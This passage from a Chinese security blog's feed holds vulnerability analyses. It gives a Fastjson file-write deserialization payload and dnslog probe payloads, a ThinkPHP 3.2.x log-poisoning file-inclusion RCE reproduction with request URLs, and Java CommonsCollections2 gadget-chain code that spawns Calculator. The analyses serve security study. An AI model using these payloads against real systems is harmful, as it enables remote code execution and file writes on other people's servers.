data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916173001939.png" alt="image-20210916173001939"></p><p>加载完成后赋值给 clazz ,最后还会判断一次 clazz 是否为 expectClass 的子类,如果是的话才会 return clazz。这也是为啥我们构造的 Evil 里需要继承 java.lang.AutoCloseable,这样是这个漏洞最大的限制。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210916173333755.png" alt="image-20210916173333755"></p><p>真正利用的时候还需要去找一个继承 java.lang.AutoCloseable 的类,利用起来还是比较困难的</p><p>写文件的 payload 。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">{</span><br><span class="line"> "stream": {</span><br><span class="line"> "@type": "java.lang.AutoCloseable",</span><br><span class="line"> "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",</span><br><span class="line"> "targetPath": "f:/test/pwn.txt",</span><br><span class="line"> "tempPath": "f:/test/test.txt"</span><br><span class="line"> },</span><br><span class="line"> "writer": {</span><br><span class="line"> "@type": "java.lang.AutoCloseable",</span><br><span class="line"> "@type": "com.esotericsoftware.kryo.io.Output",</span><br><span class="line"> "buffer": "文件内容 base64 编码",</span><br><span class="line"> "outputStream": {</span><br><span class="line"> "$ref": "$.stream"</span><br><span class="line"> },</span><br><span class="line"> "position": 5</span><br><span class="line"> },</span><br><span class="line"> "close": {</span><br><span class="line"> "@type": "java.lang.AutoCloseable",</span><br><span class="line"> "@type": "com.sleepycat.bind.serial.SerialOutput",</span><br><span class="line"> "out": {</span><br><span class="line"> "$ref": "$.writer"</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="Dnslog-探测-Fastjson"><a href="#Dnslog-探测-Fastjson" class="headerlink" title="Dnslog 探测 Fastjson"></a>Dnslog 探测 Fastjson</h1><p>经常有师傅在没有报错的情况下利用 dnslog 去探测 Fastjson </p><p>基本就是利用黑名单以外的类或者是 buckets 、Mappings 内的类,有些是可以无视 AutoType 的。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">{"@type":"java.net.InetAddress","val":"dnslog"}</span><br><span class="line"></span><br><span class="line">{"@type":"java.net.Inet4Address","val":"dnslog"}</span><br><span class="line"></span><br><span class="line">{"@type":"java.net.Inet6Address","val":"dnslog"}</span><br><span class="line"></span><br><span class="line">{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}</span><br><span class="line"></span><br><span class="line">{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}</span><br><span class="line"></span><br><span class="line">{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://dnslog"}}""}</span><br><span class="line"></span><br><span class="line">Set[{"@type":"java.net.URL","val":"http://dnslog"}]</span><br><span class="line"></span><br><span class="line">Set[{"@type":"java.net.URL","val":"http://dnslog"}</span><br><span class="line"></span><br><span class="line">{{"@type":"java.net.URL","val":"http://dnslog"}:0</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">https://github.com/alibaba/fastjson/issues/3841</span><br><span class="line">最新版 1.2.76 开启safeMode</span><br><span class="line">{"ss":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://xxx.dnslog.cn"}}""},}</span><br></pre></td></tr></table></figure><p>提一嘴,我觉得其实 dnslog 探测成功并不能说 fastjson 存在反序列化漏洞最多算个 ssrf,毕竟 按照fastjson 官方的修复方式,主要还是针对那些能够写文件或者 getshell 的漏洞链。</p><h1 id="一些突破黑名单的-Paylod"><a href="#一些突破黑名单的-Paylod" class="headerlink" title="一些突破黑名单的 Paylod"></a>一些突破黑名单的 Paylod</h1><p>收集中。。。慢慢更新 </p><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://blog.knownsec.com/2020/07/fastjson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%B2/">https://blog.knownsec.com/2020/07/fastjson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%B2/</a></p><p><a href="https://paper.seebug.org/994/">https://paper.seebug.org/994/</a></p><p><a href="https://paper.seebug.org/1319/#0x01-checkautotype">https://paper.seebug.org/1319/#0x01-checkautotype</a></p><p><a href="http://blog.topsec.com.cn/fastjson-1-2-24%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e%e6%b7%b1%e5%ba%a6%e5%88%86%e6%9e%90/">http://blog.topsec.com.cn/fastjson-1-2-24%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e%e6%b7%b1%e5%ba%a6%e5%88%86%e6%9e%90/</a></p>]]></content>
<categories>
<category> JAVA安全 </category>
</categories>
<tags>
<tag> JAVA安全 </tag>
<tag> 反序列化 </tag>
<tag> Fastjson </tag>
</tags>
</entry>
<entry>
<title>ThinkPHP 3.2.x文件包含&RCE分析</title>
<link href="2021/09/06/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB&RCE%E5%88%86%E6%9E%90/"/>
<url>2021/09/06/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB&RCE%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<p>好久没看 PHP 的东西了,上个月爆了个 ThinkPHP3.2.x RCE漏洞 (本质其实是文件包含 ),刚好跟着分析一下。</p><h1 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/top-think/thinkphp.git</span><br><span class="line">cd thinkphp</span><br><span class="line">git checkout 3.2.3</span><br></pre></td></tr></table></figure><p>放到 web 目录下访问,会直接在 <code>Application</code> 目录下面自动生成公共模块 <code>Common</code>、默认模块 <code>Home </code>和<code>Runtime</code> 运行时目录</p><p>修改 Index 控制器 </p><p>Application/Home/Controller/IndexController.class.php</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">namespace Home\Controller;</span><br><span class="line"></span><br><span class="line">use Think\Controller;</span><br><span class="line"></span><br><span class="line">class IndexController extends Controller</span><br><span class="line">{</span><br><span class="line"> public function index($value='')</span><br><span class="line"> {</span><br><span class="line"> $this->assign($value);</span><br><span class="line"> $this->display();</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>把 Debug 关了,Debug 会影响日志的路径</p><h1 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h1><p>漏洞主要是文件包含,通过构造错误请求,把 payload 的写入日志文件,接着去包含日志文件从而 RCE</p><p>构造一个错误的请求访问 <code>http://host-web/index.php?m=--><?=phpinfo();?></code></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210906112303530.png" alt="image-20210906112303530"></p><p>日志路径 Application/Runtime/Logs/Common/21_09_06.log,注意访问的时候用 bp 去访问,浏览器访问的话浏览器会自动 url 编码</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210906112449843.png" alt="image-20210906112449843"></p><p>访问 <code> https://host-web/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_09_06.log</code></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210906113320516.png" alt="image-20210906113320516"></p><h1 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h1><p>说一下 thinkphp 4个视图方法</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">display();</span><br><span class="line">fetch();</span><br><span class="line">show();</span><br><span class="line">assign();</span><br></pre></td></tr></table></figure><ol><li>display</li></ol><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">display('[模板文件]'[,'字符编码'][,'输出类型'])</span><br></pre></td></tr></table></figure><p>模板文件的写法支持下面几种:</p><table><thead><tr><th>不带任何参数</th><th>自动定位当前操作的模板文件</th></tr></thead><tbody><tr><td><code>[模块@][控制器:][操作]</code></td><td>常用写法,支持跨模块 模板主题可以和theme方法配合</td></tr><tr><td>完整的模板文件名</td><td>直接使用完整的模板文件名(包括模板后缀)</td></tr></tbody></table><ol start="2"><li><p>fetch</p><p>fetch方法的用法除了不需要指定输出编码和类型外其它和display基本一致</p><p>模板文件的调用方法和 display 方法完全一样,区别就在于 fetch 方法渲染后不是直接输出</p></li><li><p>show</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show('渲染内容'[,'字符编码'][,'输出类型'])</span><br></pre></td></tr></table></figure><p>渲染内容,例如</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$this->show($content);</span><br><span class="line">// 也可以指定编码和类型</span><br><span class="line">$this->show($content, 'utf-8', 'text/xml');</span><br></pre></td></tr></table></figure></li><li><p>assign</p><p>如果要在模板中输出变量,必须在在控制器中把变量传递给模板,系统提供了 assign 方法对模板变量赋值,无论何种变量类型都统一使用assign赋值。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$this->assign('name',$value);</span><br></pre></td></tr></table></figure></li></ol> <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$array['name'] = 'thinkphp';</span><br><span class="line">$array['email'] = '[email protected]';</span><br><span class="line">$array['phone'] = '12335678';</span><br><span class="line">$this->assign($array);</span><br></pre></td></tr></table></figure><p>再来看漏洞代码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Home</span>\<span class="title">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">use</span> <span class="title">Think</span>\<span class="title">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">IndexController</span> <span class="keyword">extends</span> <span class="title">Controller</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"><span class="variable">$value</span>=<span class="string">''</span></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">$this</span>->assign(<span class="variable">$value</span>);</span><br><span class="line"> <span class="keyword">$this</span>->display();</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p> $this->assign($value); 设置了一个模版变量 $value ,$value 可控,然后用 $this->display(); 渲染。</p><p>我们传入的 $value 为数组形式 <code>value[_filename]=./Application/Runtime/Logs/Common/21_09_06.log</code></p><p>最终触发漏洞的位置</p><p>ThinkPHP/Library/Think/Storage/Driver/File.class.php</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907145112520.png" alt="image-20210907145112520"></p><p>当 $vars 不为空时,用 extract() 去处理 $vars,接着 include $_filename。很简单的一个变量覆盖漏洞,覆盖<code>$_filename</code> 可以任意文件包含。</p><p>所以只要 $vars 可控就行,我们从头跟一遍漏洞触发的过程。</p><p>访问 <code>http://host-web/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_09_06.log</code></p><p>首先进入 $this->assign($value); 方法,把 $value 赋值给 $this->tVar;</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907150539683.png" alt="image-20210907150539683"></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907150735310.png" alt="image-20210907150735310"></p><p>接着调用 $this->display() 渲染模版。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907150843233.png" alt="image-20210907150843233"></p><p>在 77 行进入 $this->fetch() 方法解析模版</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907150959859.png" alt="image-20210907150959859"></p><p>$content 为空直接往下走,133 行判断了一下是否使用 php 原生的模版引擎,直接看 else 的部分</p><p>把一些参数放到了数组 $params 里,其中 ‘var’ => $this->tVar ,这里用到了前面 $this->tVar 也就是我们传入的 $value。</p><p>接着调用 Hook::listen(‘view_parse’, $params);</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907151720608.png" alt="image-20210907151720608"></p><p>都是一写记录日志的代码,重点看 99 行 <code>$result = self::exec($name, $tag, $params);</code></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907152451273.png" alt="image-20210907152451273"></p><p>这个方法是用来执行插件的,这里会去调用 Behavior\ParseTemplateBehavior 了类的 run 方法,</p><p>传入的参数为 $params 其中包含了 $this->tVar </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$addon = new $name();</span><br><span class="line">return $addon->$tag($params);</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907152519791.png" alt="image-20210907152519791"></p><p>判断了一下是否采用 Think 的模版引擎,接着对一些参数进行判断,</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907153223195.png" alt="image-20210907153223195"></p><p>最后会调用 <code>$tpl->fetch($_content, $_data['var'], $_data['prefix']);</code></p><p>这里的 $_data 就是我们调用 run 方法时传入的 $params , $_data[‘var’] 其实就是 $this->tVar 也就是我们传入的 $value。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907153431668.png" alt="image-20210907153431668"></p><p>把我们传入的 $_data[‘var’] 赋值给 $this->tVar 接着去调用 <code>Storage::load($templateCacheFile, $this->tVar, null, 'tpl');</code></p><p>接着就是最终触发漏洞的地方,第二个参数 $vars ,其实就是传入的 $this->tVar,也就是我们传入的 $value。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/ThinkPHP%203.2.x%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%26RCE%E5%88%86%E6%9E%90.assert/image-20210907153713234.png" alt="image-20210907153713234"></p><h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>所以这个漏洞本质上就是一个任意文件包含漏洞,利用的前提是 assign() 方法的第一个参数可控。但是好像很少有人会这么写代码,github 上翻了一些基于 thinphp3.2.x 的项目没找到能利用的。。。</p><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ">https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ</a></p><p><a href="https://www.kancloud.cn/thinkphp/thinkphp_quickstart/2145">https://www.kancloud.cn/thinkphp/thinkphp_quickstart/2145</a></p>]]></content>
<categories>
<category> 代码审计 </category>
</categories>
<tags>
<tag> ThinkPHP </tag>
<tag> RCE </tag>
<tag> 文件包含 </tag>
<tag> 漏洞分析 </tag>
</tags>
</entry>
<entry>
<title>CommonCollections2-7利用链分析</title>
<link href="2021/03/02/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90/"/>
<url>2021/03/02/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<h1 id="CommonCollections2"><a href="#CommonCollections2" class="headerlink" title="CommonCollections2"></a>CommonCollections2</h1><p><code>commons-collections4.0</code></p><h2 id="利用链分析"><a href="#利用链分析" class="headerlink" title="利用链分析"></a>利用链分析</h2><p> 先看 ysoserial 的 Gadget</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream.readObject()</span><br><span class="line"> PriorityQueue.readObject()</span><br><span class="line"> ...</span><br><span class="line"> TransformingComparator.compare()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.exec()</span><br></pre></td></tr></table></figure><p>与 cb1 链类似,利用 PriorityQueue 反序列化的时候会对队列中的元素使用比较器的 compare 方法即 comparator.compare() 去处理。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302141409482.png" alt="image-20210302141409482"></p><p>cc2 链使用的比较器是 TransformingComparator,直接看 TransformingComparator.compare()</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302141604737.png" alt="image-20210302141604737"></p><p>在比较前会用自身 transformer 的 transform 方法处理 queue 中的值,TransformingComparator.transformer 为InvokerTransformer ,继续看 InvokerTransformer 的 transform() 方法。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302142138615.png" alt="image-20210302142138615"></p><p>利用反射调用对象 input 的任意方法,方法名为自身的 this.iMethodName 属性,参数啥的也都是自身属性。</p><p>分析到这应该就明白 cc2 链是如何执行命令的了,只要找到一个能够执行命令的方法即可。ysoserial 用的是 TemplatesImpl,通过调用 TemplatesImpl 中的 newTransformer() 方法或者 getOutputProperties() 可以加载字节码执行命令。具体可以看 <a href="https://blog.weik1.top/2021/01/15/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE/">TemplatesImpl利用链分析</a></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302142804183.png" alt="image-20210302142804183"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>自己写代码实现一下整条链</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> payload;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.commons.beanutils.BeanComparator;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.comparators.TransformingComparator;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.functors.InvokerTransformer;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Gadgets;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Reflections;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.PriorityQueue;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonCollections2</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"> <span class="comment">// 直接用 ysoserial 的 Gadgets.createTemplatesImpl创建一个恶意 templates 类</span></span><br><span class="line"> String args1 = <span class="string">"/System/Applications/Calculator.app/Contents/MacOS/Calculator"</span>;</span><br><span class="line"> <span class="keyword">final</span> Object templates = Gadgets.createTemplatesImpl(args1);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 构造 InvokerTransformer 设置 iMethodName 为 newTransformer 或者 getOutputProperties,参数类型和参数值根据调用的方法设置就行</span></span><br><span class="line"> InvokerTransformer invokerTransformer = <span class="keyword">new</span> InvokerTransformer(<span class="string">"newTransformer"</span>,<span class="keyword">null</span>,<span class="keyword">null</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment">// 构建 TransformingComparator 比较器设置 transformer 为我们构造的 invokerTransformer</span></span><br><span class="line"> TransformingComparator transformingComparator = <span class="keyword">new</span> TransformingComparator(invokerTransformer);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建 PriorityQueue</span></span><br><span class="line"> <span class="keyword">final</span> PriorityQueue<Object> queue = <span class="keyword">new</span> PriorityQueue<Object>(<span class="number">2</span>, transformingComparator);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment">//向里PriorityQueue添加构造的恶意 templates,触发比较,就不通过反序列化触发比较了</span></span><br><span class="line"> queue.add(templates);</span><br><span class="line"> queue.add(templates);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>触发比较后成功弹出计算器。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302145522382.png" alt="image-20210302145522382"></p><p>用 getOutputProperties() 方法也是一样的,两个方法都是无参的,参数类型和参数值都设置成 null 就行</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302145739943.png" alt="image-20210302145739943"></p><h1 id="CommonCollections3"><a href="#CommonCollections3" class="headerlink" title="CommonCollections3"></a>CommonCollections3</h1><p><code>commons-collections3.1</code>和CommonsCollection1一样,也是利用 AnnotationInvocationHandler` 动态代理机制触发,高版本的 jdk8 无法利用</p><h2 id="利用链分析-1"><a href="#利用链分析-1" class="headerlink" title="利用链分析"></a>利用链分析</h2><p>先看 ysoserial 是如何构造的。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections2-7%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E5%88%86%E6%9E%90.assets/image-20210302152620733.png" alt="image-20210302152620733"></p><p>cc3 这条链基本一样,cc1 主要通过调用 ChainedTransformer 的 transform 方法,从而链式调用 Transformer 数组里元素的 transform 方法,最后通过 AnnotationInvocationHandler+LazyMap#get() 触发 ChainedTransformer 的 transform 方法,具体可以看 <a href="https://blog.weik1.top/2021/01/26/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90">CommonCollections1链分析</a></p><p>cc3 与 cc1 唯一的不同就是 Transformer 数组 </p><p>CC1 是通过 InvokerTransformer#transform() 方法里的反射调用机制来执行命令</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">new ConstantTransformer(Runtime.class),</span><br><span class="line"></span><br><span class="line">new InvokerTransformer("getMethod", new Class[] {</span><br><span class="line">String.class, Class[].class }, new Object[] {</span><br><span class="line">"getRuntime", new Class[0] }),</span><br><span class="line"></span><br><span class="line">new InvokerTransformer("invoke", new Class[] {</span><br><span class="line">Object.class, Object[].class }, new Object[] {</span><br><span class="line">null, new Object[0] }),</span><br><span class="line"></span><br><span class="line">new InvokerTransformer("exec",new Class[] { String.class }, execArgs),</span><br><span class="line">new ConstantTransformer(1) </span><br></pre></td></tr></table></figure><p>CC3 构造的 Transformer 数组如下</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">new ConstantTransformer(TrAXFilter.class),</span><br><span class="line">new InstantiateTransformer(</span><br><span class="line">new Class[] { Templates.class },</span><br><span class="line">new Object[] { templatesImpl }</span><br></pre></td></tr></table></figure><p>ConstantTransformer 的作用是包裹一个对象,在调用其 transform 方法时返回这个对象,这里返回的就是 TrAXFilter 类对象,然后作为 InstantiateTransformer#transform() 方法的参数。看 InstantiateTransformer 的 transform() 方法</p><p><img src="" 